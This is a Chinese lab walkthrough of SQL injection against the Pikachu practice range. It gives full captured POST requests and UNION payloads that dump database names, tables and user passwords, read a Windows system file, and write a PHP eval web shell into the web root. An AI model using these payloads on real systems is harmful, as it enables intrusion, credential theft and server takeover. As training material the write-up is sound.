pikachu靶场SQL-Inject模块的实验操作
pikachu靶场SQL-Inject模块的实验操作
实验环境
-
pikachu靶场
-
bp抓包
-
FoxyProxy插件
-
hackbar插件
实验思路
- 分析网站以及数据包,找到可能纯在的注入点(可控变量)
- 测试可能纯在的注入点(可控变量)是否可以被直接或间接的修改其值,并根据回显信息判断是否能够完整(即网站没有对该变量的值进行过滤或者该过滤能够被绕过)的传到数据库中执行
- 进行sql注入,拿到想要的信息
实验步骤
实验一:数字型注入(post)

1.分析数据包
首先分析这是一个post请求,通过浏览器提交查询,bp抓包分析数据包


POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=2&submit=%E6%9F%A5%E8%AF%A2
可知我们提交查询的数据是通过id变量提交,同时也通过submit变量提交我们的是否提交的状态,因此id可能纯在注入点。
2.判断是否是注入点
我们将数据包放在bp的Repeater模块中,通过修改数据包中id变量的值来判断网站是否对id的值进行过滤以及该值是否会带到数据库中执行

通过修改数据包中id变量的值并发送后的响应信息可知,该值没有被过滤并带到了数据库执行

#请求数据包
POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=2'&submit=%E6%9F%A5%E8%AF%A2
#回显信息
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
说明id是可控变量,并且网站没有过滤,下一步我们要进行sql注入
3.sql注入
1.判断是数字型还是字符型:通过and 1=1和and 1=2判断,响应包正常回显,说明是数字型。

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=2 and 1=1 &submit=%E6%9F%A5%E8%AF%A2

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=2 and 1=2 &submit=%E6%9F%A5%E8%AF%A2
2.查询所有用户的信息:or 1=1

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=2 or 1=1 &submit=%E6%9F%A5%E8%AF%A2
3.order by猜测字段:输入order by 2时还能查询到结果,但输入order by 3时就没有结果了,说明有两个字段。


POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=2 order by 2&submit=%E6%9F%A5%E8%AF%A2
4.union查询:因为前面有两个字段,所以查询时只能有两个占位显示符

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=-2 union select 1,2 &submit=%E6%9F%A5%E8%AF%A2
5.爆库、用户、版本号、表、列、字段值:
- 利用函数 database(),user(),version() 可以得到所探测数据库的数据库名、用户名和版本号
id=-1 union select database(),user()


- 爆表(group_concat函数让查询的结果在一行显示)
id=-2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'

- 爆破users表中的字段(列名)
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'

- 爆字段值,爆破users表中字段的值
id=-1 union select username,password from users

6.读取系统文件
id=-1 union select 1,load_file('C:\\Windows\\win.ini')

7.写入木马文件
id=1 union select 1,'<?php @eval($_POST["m"]);?>' into outfile 'C:/phpstudy/www/pikachu/vul/sqli/shell.php'



浙公网安备 33010602011771号